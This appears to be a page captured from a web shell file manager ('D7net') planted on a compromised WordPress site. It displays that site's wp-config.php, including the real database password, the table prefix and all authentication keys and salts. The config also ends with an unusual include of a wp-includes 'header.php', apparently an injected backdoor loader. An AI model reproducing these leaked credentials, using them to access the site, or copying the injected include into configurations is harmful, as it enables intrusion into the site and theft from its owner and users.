D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
home
/
etb1lp46s9ed
/
public_html
/
kwalitybazaar.site
/
aa
/
Filename :
wp-config.php
back
Copy
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'kwalitybazaar_kwality' ); /** Database username */ define( 'DB_USER', 'kwalitybazaar_kwality' ); /** Database password */ define( 'DB_PASSWORD', 'dGK0AmxzMsjn' ); /** Database hostname */ define( 'DB_HOST', 'localhost:3306' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', 'S(]|6-808Lyf74iQb3l2/l6l0#g:G]wnWw622*+4ZWidm%!R757uoM*OT_9dL7%t'); define('SECURE_AUTH_KEY', 'Yt61hP!8rSVVcfk4(MQ-)%~a]egKYk#)2-yTZa/c%:A7Z1S_7:[Y[i_1/;OFC1+]'); define('LOGGED_IN_KEY', 'q6#JDWk28//|E%0)PwtFO8u9J;twm[y/263xgOe6p88k1Z|FU)0|1-*!H5XVz3T7'); define('NONCE_KEY', ':@3dF469L(wDI5neV5#72lS]ro+ySgSS3[dPgE19z@r)fmzdpwI;eg5:-q*)6@49'); define('AUTH_SALT', '21Z2KA1[UM2aA7D7d7t:_UllHIA7(HZ4g7K7_hN|a!2lGY8l3*8F_c:*;e:-_9gn'); define('SECURE_AUTH_SALT', '@1l~1R04UZCv-s@h+zmn53DqJi3Y9*E6fZ[UmPiw~C@1fB8g-zDkw!(Az#&AJ6~b'); define('LOGGED_IN_SALT', 'QrOjx(w9KL87VtRSoy/crqhhSlm83hc[M5*c73PtxjA1-CH7G-952~35H!O;C4CU'); define('NONCE_SALT', 'NS5Zp*A4y%l6e@!)Q(SF!3v~|26Q155iir_08F_sjps2Sy_g0apk:wb!7IaPSDt6'); /**#@-*/ define('DISALLOW_FILE_EDIT', false); define('DISALLOW_FILE_MODS', false); /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'IYEY3_'; /* Add any custom values between this line and the "stop editing" line. */ define('WP_ALLOW_MULTISITE', true); /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ if ( ! defined( 'WP_DEBUG' ) ) { define( 'WP_DEBUG', false ); } /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php'; include_once(ABSPATH . WPINC . '/header.php');